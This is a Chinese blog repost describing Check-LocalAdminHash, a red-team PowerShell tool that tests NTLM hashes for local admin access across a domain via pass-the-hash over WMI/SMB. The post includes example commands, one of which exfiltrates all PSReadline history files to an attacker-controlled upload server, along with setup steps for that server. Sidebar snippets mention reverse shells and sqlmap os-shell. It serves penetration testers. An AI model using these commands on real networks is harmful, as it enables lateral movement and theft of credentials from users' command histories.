PowerShell哈希验证与历史记录渗透技术解析

最新推荐文章于 2025-09-01 21:38:30 发布
最新推荐文章于 2025-09-01 21:38:30 发布
阅读量683 收藏 19
点赞数 12
CC 4.0 BY-SA版权
文章标签: 哈希算法 算法 PowerShell 渗透测试 红队工具 java 人工智能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weishi122/article/details/151059362

Check-LocalAdminHash & 渗透所有PowerShell历史记录

作者:Beau Bullock

TL;DR

Check-LocalAdminHash是一款新型PowerShell脚本,可针对多台主机验证密码哈希是否为有效的管理员凭证,并能够从该凭证具有管理员权限的所有系统中提取每个配置文件下的所有PowerShell PSReadline控制台历史记录文件。

获取地址:https://github.com/dafthack/Check-LocalAdminHash

历史记录收集需求

在最近的一次评估中,我需要收集网络中所有系统的PowerShell控制台历史记录文件(PSReadline)。PSReadline控制台历史记录本质上是PowerShell版本的bash历史记录。自PowerShell 5版本起,所有在PowerShell终端中输入的内容都会被记录到磁盘文件中,可能包含密码等敏感信息。

技术挑战与环境限制

该环境中存在广泛使用的本地管理员哈希凭证(无明文密码),同时部署了多种安全工具:多个EDR和行为分析产品、应用程序白名单、多因素认证保护的RDP,且目标主机的SMB协议不可访问。唯一可用的协议是Windows管理规范(WMI)。

技术方案实现

通过组合多种现有工具实现功能:

  1. 使用PowerView模块获取域中所有计算机列表
  2. 利用Kevin Robertson的Invoke-TheHash工具进行哈希传递认证
  3. 通过Invoke-WMIExec连接每个主机并执行编码的PowerShell命令
  4. 发现系统所有配置文件中的PSReadline文件后,通过POST请求发送到可控Web服务器

Check-LocalAdminHash功能特性

该脚本可作为独立工具验证密码哈希在网络中的管理员权限分布,支持:

  • WMI和SMB协议认证
  • CIDR格式、列表格式或单机目标指定
  • 域主机自动枚举功能

示例命令

通过WMI验证本地管理员哈希

Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems

渗透所有PSReadline历史记录文件

Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems -ExfilPSReadline

PSReadline渗透服务器搭建

安全警告:需设置面向互联网的文件上传服务器,建议采取严格防火墙限制和HTTPS加密传输。

搭建步骤:

  1. 部署可HTTP/HTTPS访问的Web服务器
  2. 将index.php脚本放置到Web根目录(/var/www/html)
  3. 创建上传目录并设置权限:
    mkdir /var/www/html/uploads
chmod 0777 /var/www/html/uploads
  4. 安装PHP并重启Apache:
    apt-get install php
service apache2 restart
  5. 在Check-LocalAdminHash.ps1脚本中修改$Url变量指向服务器index.php页面

技术实现原理

该工具整合了PowerView的域枚举功能和Invoke-TheHash的哈希传递认证技术,95%代码基于这两个工具开发。支持多线程操作,可通过修改文件发现模块实现其他功能扩展。

致谢

  • Kevin Robertson的Invoke-TheHash工具
  • Will Schroeder和Matt Graeber等人的PowerView工具
  • Steve Borosh提供的多线程技术支持

相关项目

  • Invoke-TheHash:https://github.com/Kevin-Robertson/Invoke-TheHash
  • PowerView:https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    公众号二维码
    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
qife122
关注
内网后渗透攻击过程(实验环境)--4、权限维持(3)
hj06112的博客
07-27 1382
内网渗透之域控制器维权技术
《100个渗透测试技巧,能看懂一半已经是高手》
wang163cang的博客
05-07 783
如Print Spooler(CVE-2021-1675)用Sublist3r或OneForAll枚举子域名,注意过滤泛解析干扰(如DNS泛解析返回相同IP时,通过响应长度或内容差异区分)Sqlmap参数--risk=3 --level=5绕过WAF,结合--os-shell获取交互式Shell,一击必杀,直击要害。或路径穿越,读取敏感文件,利用gopher协议构造Redis未授权访问,反弹Shell到公网VPS,使本地文件泄露。通过Windows计划任务,劫持定时任务执行恶意脚本,使持久化攻击生效。
内网渗透技巧大全
黑战士的博客
04-28 1759
对于内部帐户,SPN将自动进行注册。SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。参考2 :https://3gstudent.github.io/Office-Persistence-on-x64-operating-system。安装键盘记录的目地不光是记录本机密码,是记录管理员一切的密码,比如说信箱,WEB 网页密码等等,这样也可以得到管理员的很多信息。
内网渗透系列:横向渗透方法小结
闵行小鱼塘
08-04 4736
本文学习并小结下横向渗透的方法
渗透测试完整流程
suiyuelichou的博客
07-07 1012
渗透测试是一种通过模拟恶意攻击者的技术和方法,来评估计算机系统、网络或Web应用程序安全性的方法。测试范围和目标测试方法和工具主要发现概述风险评估总结修复建议优先级渗透测试是网络安全领域的重要技能,需要不断学习和实践。理论实践结合:不仅要掌握理论知识,更要动手实践合法合规:始终在授权范围内进行测试持续学习:安全技术不断发展,需要保持学习沟通能力:能够清晰地向不同受众解释安全问题职业道德:严格遵守职业道德和法律法规通过系统学习和大量实践,你将能够胜任渗透测试工程师的工作。
渗透测试面试题总结
热门推荐
0x536d72的博客
11-25 4万+
渗透测试常见面试题
渗透测试笔试面试题目汇总
Bulldozer_GD的博客
11-25 7278
1、为何一个MYSQL数据库的站,只有一个80端口开放? 2、一个成熟并且相对安全的CMS,渗透时扫目录的意义? 3、在某后台新闻编辑界面看到编辑器,应该先做什么? 4、审查上传点的元素有什么意义? 5、CSRF、XSS及XXE有什么区别,以及修复方式? 6、3389无法连接的几种情况 7、列举出owasp top10 2017 8、说出至少三种业务逻辑漏洞,以及修复方式? 9、目标站无防护,上传图片可以正常访问,上传脚本格式访问则403,什么原因? 10、目标站禁止注册用户,找回密码处随便输入用户名提示:
渗透安全测试
龙卷风摧毁停车场
10-09 1万+
CTF 内网攻防 ssh私钥泄漏 信息探测 -nmap -sV 目标IP 1.分析端口,针对特殊端口进行探测,对开放大端口的http服务进行排查 2.针对http服务可以使用web进行测试http://ip:port 3.右键查看网页源代码 4.使用工具dirb http://ip:port/ 对服务的隐藏文件进行探测 查看敏感醒目的文件名进行访问可能会获取flag值 可以直接下载ssh私钥,进行配对,进入ssh文件夹下的私钥文件,关键名文件进行下载 给私钥可读可写权限,进入关键名文件下查看用户名等敏感信
渗透测试不同阶段的开源/商业工具
sunny_r8的博客
06-09 983
该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。 侦察 主动情报收集 EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。https://github.com/ChrisTruncer/EyeWitness AWSBucketDump:AWS S3安全扫描工具,允许你快速枚举AWS S3 buckets以查找有趣或机密的文件。https://github.com/jordanpotti/AWSBucketDump AQUATONE:子域名枚举探测
Web 渗透测试实践指南(三)
龙哥盟
06-23 670
现在是开始学习 Python 的时候了。我在书中加入这一节有两个原因。首先,我希望你在未来开发 Python 脚本时能作为参考。其次,我希望刷新你对这门神奇编程语言的记忆。需要注意的是,我无法将所有关于这门语言的信息都放在附录中,因此我会包括一些 Python 的最重要元素,帮助你在职业生涯中获得最大的成果。你可以通过在终端窗口的 Python 解释器中学习和尝试以下示例——只需在终端窗口中输入 Python,你就可以开始了。
网络安全渗透
李子木的博客
04-04 8773
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 (1)安装sqlmap前,需要.
【渗透笔记】Windows密码凭证获取
白菜猪肉炖粉条
12-03 2934
Windows Hash Windows系统使用两种方法对用户的密码进行哈希处理,它们分别是**LAN Manager(LM)哈希和NT LAN Manager(NTLM)**哈希。 LM哈希存在缺陷,所以新版的win不再使用 LM哈希密码最大长度为14,密码长度超过14位使用NTLM哈 希 所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行 一次数学加密函数运算,然后返回一个固定长度的字符串。 现在已经有了更新的NTLMv2以及Kerberos验证体系
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8734
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
C++ 面试高频考点 力扣 35. 搜索插入位置 二分查找 左右端点查找 题解 每日一题
最新发布
Q741_147的博客
09-01 707
本文围绕力扣 35 题 “搜索插入位置” 展开,该题要求在排序数组中找目标值索引,无则返回插入位置,且需 O (log n) 复杂度。文章先分析用二分查找的原因(有序数组的二段性),再详解两种实现思路:左端点定位(找最后一个≤target 的元素,据其算插入点)右端点定位(找第一个≥target 的元素,位置即答案),给出对应代码,最后总结二分关键细节,助力掌握二分逻辑。
[水果目标检测4]:YOLOv7-CA+追踪算法
cbdA_ZAI的博客
08-28 163
原文:Fruit Detection and Counting in Apple Orchards Based on Improved Yolov7 and Multi-Object Tracking Methods。
北斗导航 | RAIM算法改进方案及性能对比分析报告
尘世冰封的专栏
08-30 673
多假设分组算法通过构建卫星子集组合实现故障检测隔离,核心原理是将可见卫星划分为多个假设子集,对每个子集进行定位解算并比较结果一致性。
算法:归并排序
2301_80219163的博客
09-01 332
归并排序
LeetCode 136. 只出现一次的数字
qscfgjn的博客
08-30 284
除了某个元素只出现一次以外,其余每个元素均出现两次。找出那个只出现了一次的元素。你必须设计并实现线性时间复杂度的算法来解决此问题,且该算法只使用常量额外空间。
算法(①贪心算法
hongsegeming的博客
08-30 332
问题:你有一个容量为 W 的背包,有很多物品,每个物品都有自己的重量和价值。你可以切割物品,也就是可以只拿走一个物品的一部分。如何装背包才能使总价值最大化?贪心策略:计算每个物品的单位价值(价值/重量)。将所有物品按照单位价值从高到低排序。从单位价值最高的物品开始装入背包,直到装满为止。为什么是贪心?在每一步,我们都选择当前“最划算”的物品(单位价值最高),因为我们希望以最快的速度增加背包的总价值。对于部分背包问题,这个贪心策略是正确的,因为可以切割物品,总是能把价值最高的部分装进去。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值